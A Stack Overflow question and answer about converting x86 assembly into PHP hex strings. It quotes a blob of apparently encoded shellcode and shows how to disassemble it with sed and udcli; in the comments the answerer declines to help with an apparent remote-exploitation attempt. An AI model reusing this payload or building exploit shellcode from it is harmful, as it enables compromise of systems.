0

How can I convert assembly codes to string like this in PHP:

$shellcode =
"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf4".
"\x47\xba\xa4\x83\xeb\xfc\xe2\xf4\x08\xaf\xfe\xa4\xf4\x47\x31\xe1".
"\xc8\xcc\xc6\xa1\x8c\x46\x55\x2f\xbb\x5f\x31\xfb\xd4\x46\x51\xed".
"\x7f\x73\x31\xa5\x1a\x76\x7a\x3d\x58\xc3\x7a\xd0\xf3\x86\x70\xa9".
"\xf5\x85\x51\x50\xcf\x13\x9e\xa0\x81\xa2\x31\xfb\xd0\x46\x51\xc2".
"\x7f\x4b\xf1\x2f\xab\x5b\xbb\x4f\x7f\x5b\x31\xa5\x1f\xce\xe6\x80".
"\xf0\x84\x8b\x64\x90\xcc\xfa\x94\x71\x87\xc2\xa8\x7f\x07\xb6\x2f".
"\x84\x5b\x17\x2f\x9c\x4f\x51\xad\x7f\xc7\x0a\xa4\xf4\x47\x31\xcc".
"\xc8\x18\x8b\x52\x94\x11\x33\x5c\x77\x87\xc1\xf4\x9c\xb7\x30\xa0".
"\xab\x2f\x22\x5a\x7e\x49\xed\x5b\x13\x24\xdb\xc8\x97\x47\xba\xa4";

I guess this is opcodes of asm codes written in HEX. But if so, how can I convert asm codes like these strings?

Deduplicator
  • 44,692
  • 7
  • 66
  • 118
  • 1
    This is not assembly code. This is a series of bytes written in ASCII in hexadecimal format. Do you want to disassemble this or do you want to convert each hexadecimal value to a corresponding ASCII or UTF-8 character? – nrz Feb 04 '13 at 20:03

1 Answers1

2

If using PHP is not a requirement, this can be done easily in Linux console by using eg. udcli disassembler that comes with udis86 disassembler library. You can check my answer to Disassembling file that contain big data or is compressed .

For this particular case of yours using eg. sed does nicely the job to convert the data to a format usable by udcli:

$ echo '\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf4". "\x47\xba\xa4\x83\xeb\xfc\xe2\xf4\x08\xaf\xfe\xa4\xf4\x47\x31\xe1". "\xc8\xcc\xc6\xa1\x8c\x46\x55\x2f\xbb\x5f\x31\xfb\xd4\x46\x51\xed". "\x7f\x73\x31\xa5\x1a\x76\x7a\x3d\x58\xc3\x7a\xd0\xf3\x86\x70\xa9". "\xf5\x85\x51\x50\xcf\x13\x9e\xa0\x81\xa2\x31\xfb\xd0\x46\x51\xc2". "\x7f\x4b\xf1\x2f\xab\x5b\xbb\x4f\x7f\x5b\x31\xa5\x1f\xce\xe6\x80". "\xf0\x84\x8b\x64\x90\xcc\xfa\x94\x71\x87\xc2\xa8\x7f\x07\xb6\x2f". "\x84\x5b\x17\x2f\x9c\x4f\x51\xad\x7f\xc7\x0a\xa4\xf4\x47\x31\xcc". "\xc8\x18\x8b\x52\x94\x11\x33\x5c\x77\x87\xc1\xf4\x9c\xb7\x30\xa0". "\xab\x2f\x22\x5a\x7e\x49\xed\x5b\x13\x24\xdb\xc8\x97\x47\xba\xa4";"' | sed 's/\\x/ /g' | sed 's/"//g' | sed 's/\.//g' | sed 's/;//g' | udcli -x -32
Community
  • 1
  • 1
nrz
  • 10,435
  • 4
  • 39
  • 71
  • Please look at this: http://www.exploit-db.com/exploits/5536/ -- He says: $scode = "\x66\x83\xC0\x04\xFF\xE0"; /*ADD EAX, 4 => JMP EAX*/ But how did he convert asm code to \x...\x... ? -- Actually i want to do this for inline asm but i dont know how to convert. Thanks.. –  Feb 05 '13 at 08:53
  • I see here no legitimate purpose for your attempt to exploit remote servers by using a PHP script. If you were a sys admin wanting to legitimately test the vulnerability of your own server, I assume you knew enough about assembling, disassembling, hex dumps and regexes that you wouldn't need to ask how to assemble x86 assembly code and make a hex dump of the binary in a format suitable for PHP. I can't help you in this attempt. – nrz Feb 05 '13 at 11:45
  • Thank you for response. I just wanted to give a obvious example about my question. I wont code exploit of course, but i will use this for patching binaries for personal purposes. .. Anyway i found the solution! : https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding . Thank you all –  Feb 05 '13 at 19:46